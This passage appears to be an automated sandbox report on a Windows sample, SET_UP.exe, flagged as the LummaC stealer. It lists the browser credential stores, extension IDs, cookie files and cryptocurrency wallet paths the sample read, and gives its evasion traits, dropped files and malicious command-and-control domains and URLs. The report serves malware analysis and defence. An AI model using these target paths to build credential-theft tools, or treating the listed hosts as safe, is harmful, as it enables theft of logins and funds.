            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7480, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7480, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Deobfuscate/Decode Files or Information            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Input Capture            		12
            File and Directory Discovery            		Remote Desktop Protocol41
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)1
            Access Token Manipulation            		1
            Obfuscated Files or Information            		Security Account Manager225
            System Information Discovery            		SMB/Windows Admin Shares1
            Input Capture            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login Hook11
            Process Injection            		1
            DLL Side-Loading            		NTDS521
            Security Software Discovery            		Distributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
            Virtualization/Sandbox Evasion            		Cached Domain Credentials221
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync11
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection            		Proc Filesystem2
            System Owner/User Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584507 Sample: SET_UP.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 79 cutefingeuker.click 2->79 81 klipvumisui.shop 2->81 83 cegu.shop 2->83 101 Suricata IDS alerts for network traffic 2->101 103 Found malware configuration 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 9 other signatures 2->107 12 SET_UP.exe 1 2->12         started        signatures3 process4 dnsIp5 85 cutefingeuker.click 188.114.96.3, 443, 49748, 49750 CLOUDFLARENETUS European Union 12->85 87 cegu.shop 185.161.251.21, 443, 49757 NTLGB United Kingdom 12->87 89 klipvumisui.shop 104.21.37.128, 443, 49758 CLOUDFLARENETUS United States 12->89 69 C:\...\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe, PE32 12->69 dropped 109 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->109 111 Suspicious powershell command line found 12->111 113 Query firmware table information (likely to detect VMs) 12->113 115 4 other signatures 12->115 17 LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe 2 12->17         started        21 powershell.exe 7 12->21         started        file6 signatures7 process8 file9 61 C:\...\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp, PE32 17->61 dropped 91 Multi AV Scanner detection for dropped file 17->91 23 LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp 3 5 17->23         started        26 conhost.exe 21->26         started        signatures10 process11 file12 63 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->63 dropped 65 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->65 dropped 28 LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe 2 23->28         started        process13 file14 67 C:\...\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp, PE32 28->67 dropped 31 LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp 5 7 28->31         started        process15 file16 71 C:\Users\user\AppData\...\is-FCQ2K.tmp, PE32 31->71 dropped 73 C:\Users\user\...\BrightLib.exe (copy), PE32 31->73 dropped 75 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->77 dropped 34 BrightLib.exe 31->34         started        37 cmd.exe 1 31->37         started        39 cmd.exe 1 31->39         started        41 5 other processes 31->41 process17 signatures18 93 Tries to detect virtualization through RDTSC time measurements 34->93 95 Sample or dropped binary is a compiled AutoHotkey binary 34->95 97 Switches to a custom stack to bypass stack traces 34->97 99 Found direct / indirect Syscall (likely to bypass EDR) 34->99 43 conhost.exe 37->43         started        45 tasklist.exe 1 37->45         started        47 find.exe 1 37->47         started        49 conhost.exe 39->49         started        57 2 other processes 39->57 51 conhost.exe 41->51         started        53 conhost.exe 41->53         started        55 tasklist.exe 1 41->55         started        59 10 other processes 41->59 process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SET_UP.exe8%VirustotalBrowse
            SET_UP.exe18%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe74%ReversingLabsWin32.Spyware.Lummastealer
            C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp0%ReversingLabs
            C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
            C:\Users\user\AppData\Roaming\ColorStreamLib\is-FCQ2K.tmp8%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://cutefingeuker.click/pi0%Avira URL Cloudsafe
            https://www.tomabo.com/mp4-player/purchase.html0%Avira URL Cloudsafe
            https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo0%Avira URL Cloudsafe
            https://cutefingeuker.click/pi10%Avira URL Cloudsafe
            https://cutefingeuker.click/0%Avira URL Cloudsafe
            https://klipvumisui.shop/int_clp_sha.txtf1$m100%Avira URL Cloudmalware
            https://cutefingeuker.click/api10%Avira URL Cloudsafe
            https://klipvumisui.shop/int_clp_sha.txtFmsZr100%Avira URL Cloudmalware
            https://cutefingeuker.click/QQ0%Avira URL Cloudsafe
            https://cutefingeuker.click/buL0%Avira URL Cloudsafe
            https://www.tomabo.com/videos/dog-and-balls.mp40%Avira URL Cloudsafe
            https://www.tomabo.com/mp4-player/download.html0%Avira URL Cloudsafe
            https://cutefingeuker.click/&&.0%Avira URL Cloudsafe
            https://cutefingeuker.click/80%Avira URL Cloudsafe
            https://cegu.shop/u100%Avira URL Cloudmalware
            https://cutefingeuker.click/bub0%Avira URL Cloudsafe
            https://cutefingeuker.click/api#0%Avira URL Cloudsafe
            https://www.tomabo.com/mp4-playerA0%Avira URL Cloudsafe
            https://dfgh.online/invo100%Avira URL Cloudmalware
            https://klipvumisui.shop/Y100%Avira URL Cloudmalware
            https://klipvumisui.shop/L100%Avira URL Cloudmalware
            https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP40%Avira URL Cloudsafe
            https://klipvumisui.shop/100%Avira URL Cloudmalware
            https://cutefingeuker.clGS0%Avira URL Cloudsafe
            https://cutefingeuker.click:443/api0%Avira URL Cloudsafe
            https://cutefingeuker.click/api0%Avira URL Cloudsafe
            https://cutefingeuker.click/apig0%Avira URL Cloudsafe
            https://www.tomabo.com/mp4-player0%Avira URL Cloudsafe
            https://cegu.shop/8574262446/ph.txtk9100%Avira URL Cloudmalware
            cutefingeuker.click0%Avira URL Cloudsafe
            https://www.tomabo.com0%Avira URL Cloudsafe
            https://dfgh.online/invoker.php?compName=hZ100%Avira URL Cloudmalware
            https://www.tomabo.com/mp4-player/update.xml0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cegu.shop
            		185.161.251.21
            		truefalse
              		high
              cutefingeuker.click
              		188.114.96.3
              		truetrue
                		unknown
                klipvumisui.shop
                		104.21.37.128
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://klipvumisui.shop/int_clp_sha.txtfalse
                    		high
                    rabidcowse.shopfalse
                      		high
                      wholersorie.shopfalse
                        		high
                        https://cutefingeuker.click/apitrue
                        • Avira URL Cloud: safe
                        		unknown
                        cloudewahsj.shopfalse
                          		high
                          noisycuttej.shopfalse
                            		high
                            cutefingeuker.clicktrue
                            • Avira URL Cloud: safe
                            		unknown
                            nearycrepso.shopfalse
                              		high
                              https://cegu.shop/8574262446/ph.txtfalse
                                		high
                                framekgirus.shopfalse
                                  		high
                                  tirepublicerj.shopfalse
                                    		high
                                    abruptyopsn.shopfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabSET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
